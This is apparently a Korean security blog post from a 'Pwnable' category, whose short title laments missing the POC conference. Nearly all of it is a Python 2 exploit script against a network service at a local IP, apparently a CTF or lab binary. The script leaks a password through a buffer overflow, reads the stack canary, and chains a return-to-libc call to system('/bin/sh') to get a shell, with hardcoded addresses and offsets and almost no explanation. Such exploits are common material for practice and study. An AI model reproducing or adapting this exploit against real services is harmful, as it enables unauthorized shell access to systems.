반응형
POC를 못가는 슬픔...
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 | from socket import * from time import sleep from struct import pack,unpack p = lambda x: pack("<L",x) up = lambda x: unpack("<L",x)[0] connectto = ('192.168.223.129',1127) def getpassword(): S=socket(AF_INET,SOCK_STREAM) S.connect(connectto) S.send("A"*0x11d+p(0x804b060)+"\n") #Password Leak print S.recv(1024) ipw = S.recv(1024) print ipw print "[!] Password : "+ipw[ipw.find("***:")+5:ipw.find("terminated")] return ipw[ipw.find("***:")+5:ipw.find("terminated")] def main(): Password = getpassword() S=socket(AF_INET,SOCK_STREAM) S.connect(connectto) system_plt = 0x8048610 canary = 0x00000000 name_data = 0x804b0e0 print S.recv(1024) # Set not to go exit(1) S.send(Password+"\n") sleep(0.5) print S.recv(1024) S.send("2\n") print S.recv(1024) S.send("1\n") print S.recv(1024) # Set name data to "/bin/sh"and get canary S.send("4\n") print S.recv(1024) S.send("A"*0x16) # get canari print S.recv(1024) S.send("/bin/sh;") print S.recv(1024) S.send("A\n") sleep(1) icanary = S.recv(1024) print "1" print icanary canary = up(chr(0x0)+icanary[69:72]) print "[!] Canary : " + hex(canary) # Attack RTL with canary S.send("3\n") print S.recv(1024) S.send("A"*0xd9+p(canary)+"A"*0xC+p(system_plt)+"AAAA"+p(name_data)+"\n") sleep(0.5) print S.recv(1024) # exit S.send("0\n") sleep(0.5) print S.recv(1024) S.send("1\n") sleep(1.5) print S.recv(1024) # get id at /bin/sh S.send("id;\n") print S.recv(1024) if __name__ == "__main__": main() | cs |
'Pwnable > Etc' 카테고리의 다른 글
| Docker & Docker Compose 설치법 (0) | 2017.05.05 |
|---|---|
| BFF Fuzzer 약간설명&옵션설명 (1) | 2016.02.17 |
| SongSari - Basic Bof (0) | 2015.12.01 |
| Pin Tool 간단 설명 (0) | 2015.11.21 |
| PlaidCTF-2013 pork (0) | 2015.10.28 |